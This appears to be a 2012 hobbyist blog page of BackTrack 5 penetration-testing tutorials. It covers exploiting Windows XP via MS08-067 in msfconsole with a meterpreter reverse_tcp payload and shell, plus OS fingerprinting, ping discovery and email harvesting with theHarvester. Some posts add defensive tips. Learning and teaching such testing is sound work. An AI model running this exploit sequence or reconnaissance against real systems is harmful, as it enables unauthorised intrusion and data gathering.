Sunday, June 10, 2012

Hacking target windows XP using msfconsole


The msfconsole is probably the most popular interface to the MSF. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework. Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of utilizing this interface.
The msfconsole interface will work on Windows with the 3.3 release, however users of version 3.2 will need to either manually install the Framework under Cygwin, along with patching the Ruby installation, or access the console emulator via the included web or GUI components.
Benefits
It is the only supported way to access most of the features within Metasploit.
·         Provides a console-based interface to the framework
·         Contains the most features and is the most stable MSF interface
·         Full readline support, tabbing, and command completion
Here I have learn new things how to hack to windows XP using the metasploit provided by backtrack 5
These are the steps that you need to follow.
1. Boot up Backtrack VM and start up X Windows by running startx
2. Type "cd /pentest/exploits/framework"
3. Run ./msfconsole (It Will take few seconds to run)

4. Inside metasploit, run "search windows/smb"

5. You will see that one of the exploit is: "use exploit/windows/smb/ms08_067_netapi"
6. To learn about this exploit, run "info exploit/windows/smb/ms08_067_netapi"


7. Then when ready, you can run "use exploit/windows/smb/ms08_067_netapi"
8. Run "show payloads" to view payloads

9. You will see one of the payload is: "windows/meterpreter/reverse_tcp"
10. Set payload "windows/meterpreter/reverse_tcp"

11. Set LHOST 131.107.1.200 (IP Address of Backtrack)
12. Set RHOST 131.107.1.222 (IP Address of Win XP SP2)
13. Exploit
14. Shell

Then you ready to surf your target systems.

This is only a practice to know how to use the metasploit. to prevent this happen try to update your OS.
Posted by at No comments:

OS Fingerprinting


After we know that the target machine is live, we can then find out the operating system used by the target machine. This method is commonly known as Operating\ System (OS) fingerprinting. There are two methods for doing OS fingerprinting: active and passive.
In the active method, the tool sends network packets to the target machine and then it determines the operating system of the target machine based on the analysis done on the response it received. The advantage of this method is that the fingerprinting process is fast. However, the disadvantage is that the target machine may notice our attempt to get its operating system information.
To overcome the active method disadvantage, there exists a passive method for OS fingerprinting. This method was pioneered by Michal Zalewsky when he released a tool called p0f. The disadvantage of the passive method is that the process will be slower compared to the active method.
BackTrack comes with several tools for doing OS fingerprinting. Those tools can be accessed in the BackTrack | Network Mapping | OS-Fingerprinting menu
Here I tried p0f and xprobe2 where pof is a tool used to fingerprint an OS passively where p0f is an active OS fingerprinting
This is how to use the p0f
Type #p0f –o p0f.log This will save the log information to the pof.log file.
try to connect to the target from the browser or let the target to connect to you to gain the information of the OS used.
This is the content of p0f.log

This is how to use the xprobe2
#xprobe2 192.168.137.131
The following is the result of xprobe2



To prevent somebody to scan the OS that you use I have attach a link to protect your system from the OS finger printing http://oreilly.com/pub/h/1347
Posted by at No comments:

Identifying The Target Machine


After we collect information about our target network from third-party sources, such as the search engines, we need to discover our target machines. The purpose of this discovery process is:
·         To find out which machine in the target network is available to us. If the machine is not available, we can't continue the penetration testing process, and we need to move on to the next machine.
·         To find out the underlying operating system that is used by the target machine.
The purposes mentioned above will help us during the vulnerabilities mapping process.
To help us in the target discovery process, we can utilize the tools provided in BackTrack 5 R2. Most of these tools are available in the Network Mapping menu with the following sub-menus:
·         Identify live hosts, and
·         OS-Fingerprinting

The tools included in this category are used to identify target machines that are available. However, first we need to know our client's terms and agreements. If the agreements require us to hide pentesting activities, then we need to conceal our penetration testing activities. Stealth technique may also be applied for testing Intrusion Detection System (IDS) or Intrusion Prevention System (IPS) functionality. If there are no such requirements, we may not need to conceal our penetration testing activities.
Here are the tools that I have tried to identify the target machine:
Ping
The ping tool is the most famous tool to check whether a particular host is available. The ping tool works by sending an ICMP ECHO REQUEST packet to the target host then if the target host available and not blocking a ping request it will reply with ICMP ECHO REPLY packet.
Here is the example to use the ping tool that I tested with target 192.168.0.199:
Open the Terminal in your backtrack and type #ping –c 2 –s 1000 192.168.0.199
1000 send 1000 bytes and 2 packets
For more detail information tries to run the wire shark to capture the traffic
The result is:

click for better picture

From the preceding screenshot, we can see that our host (10.0.2.15) sent two ICMP ECHO_REQUEST packets to the destination host (10.0.2.2). Since the destination is alive and allowing ICMP ECHO_REQUEST, it will send back the ICMP ECHO_REPLY packets to our machine.
There are still a lot of tools to identify the live host you can try some of it like genlist, fping, lanmap, etc
To prevent somebody to ping you I have read a page that help us to block hacker to do the ping request especially for windows user http://www.raymond.cc/blog/blocking-ping-response-in-windows-to-prevent-hackers-from-finding-you/
Posted by at No comments:

Information Gathering


The first stage in security assessment is focused on collecting as much information as possible about the target application. Information gathering is an important stage of a penetration test.
There many different ways to do information gathering:
By using public tools (search engines), scanners, sending simple HTTP requests, or specially crafted requests, it is possible to force the application to leak information, e.g., disclosing error messages or revealing the versions and technologies used.
In today’s blog I’ll show you how to use tool provided by backtrack which is theharvester to do information gathering to gather the target subdomain and email address.
Here I’m using Back track 5 R2.
To use theharverster :
# cd /pentest/enumeration/theharvester/
# ./theHarvester.py
It will show the usage how theharverster



As an example I will use the target domain to test it by using google
Here is the command:
#./theHarvester.py -d targetdomain -l 100 -b google
Here is the result:
*************************************
*TheHarvester Ver. 2.1 (reborn)     *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*cmartorella@edge-security.com      *
*************************************
[-] Searching in Google:
                Searching 0 results...
                Searching 100 results...

[+] Emails found:
------------------
xxxx@targetdomain.com
@targetdomain.com
@targetdomain.com

[+] Hosts found in search engines:
------------------------------------
xxx.xxx.xxx.xx:www.targetdomain.com
[+] Proposed SET

Instead of using google try to use Linkedin to find out usernames .
There still some other tools provided by back track to crawl information od the target such as Maltego, goorecon, etc
To prevent people to gather your information you should carefully choose which information that you should show in public and wich one you should keep in more secure way to share your information.
Posted by at No comments:
Subscribe to: Posts (Atom)